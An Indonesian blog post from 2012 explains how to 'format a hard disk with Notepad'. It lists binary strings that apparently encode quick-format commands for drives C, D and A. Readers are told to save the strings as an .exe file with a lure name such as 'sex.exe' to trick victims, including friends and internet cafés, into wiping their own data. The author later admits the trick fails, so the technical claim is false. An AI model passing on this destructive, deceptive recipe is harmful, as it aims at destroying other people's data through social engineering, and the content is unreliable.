Senin, 14 Mei 2012

Tips dan Trik Format Hardisk dengan Notepad


 
software binary code Tips dan Trik Format Hardisk dengan Notepad
Binary code
Ini trik jadul banget mungkin udah semua orang yang mengerti IT ( Ilmu Teknologi ) mungkin sudah mengerti semua. Mungkin bisa dibilang ini cuma sekedar catetan saja buat saya. Tetapi apabila kalian belum tahu silahkan anda lanjutkan membaca dan pelajari Tips dan trik Format Hardisk dengan Notepad.
Sebenernya ini trik dan tips Format Hardisk dengan Notepad sering digunakan untuk iseng atau merusak data – data kompi atau laptop musuh, warnet, bahkan temen sendiri kalo mau coba pake komputer sendiri aja jadi kalian ga dosa tuh. icon biggrin Tips dan Trik Format Hardisk dengan Notepad

Baik langsung aja ga usah banyak omong.
  1. Format Hardisk.
  2. 101001011000111110010010101010101010000011111100000
  3. Format Drive C
  4. 1011001100110111101110010011011010110000101110100001000000110001100111010010111000010000000101111010100010010111101011000
  5. Format Drive D
  6. 1011001100110111101110010011011010110000101110100001000000110010000111010010111000010000000101111010100010010111101011000
  7. Format Drive A
  8. 1011001100110111101110010011011010110000101110100001000000110000100111010010111000010000000101111010100010010111101011000
Caranya kalian ketik / copay code binary di atas ke notepad yang sudah kalian siapkan. Setelah itu save /simpan dalam bentuk .exe. Contoh sex.exe, atau apalah yang memancing korban supaya membuka file buatan kalian.
NB: Saya tidak bertanggung jawab atas kejadian yang terjadi.
UPDATE : Sudah saya coba. hasilnya ga ada reaksi alias gagal icon smile Tips dan Trik Format Hardisk dengan Notepad )

<p>Your browser does not support iframes.</p>

kode (3), biner komputer (2), format harddisk lewat notepad (2), kode biner (1), kode perusak dengan notepad (1), membaca harddisk dg laptop (1), membuat format harddisk (1), script buat format harddisk (1), script notepad perusak harddisk (1), binary (1)
Rating: 3.5

0 masukan:

Poskan Komentar

sebelum berkomentar ada baiknya sobat membaca aturan berikut:
+ harap berkomentar bahasa yang sopan
+ jangan berkomentar yang menyinggung SARA'
+ jangan berkomentar yang berbau pornografi
jika tidak memenuhi ketentuan di atas komentar sobat tidak akan ditampilkan. Terima kasih sebelumnya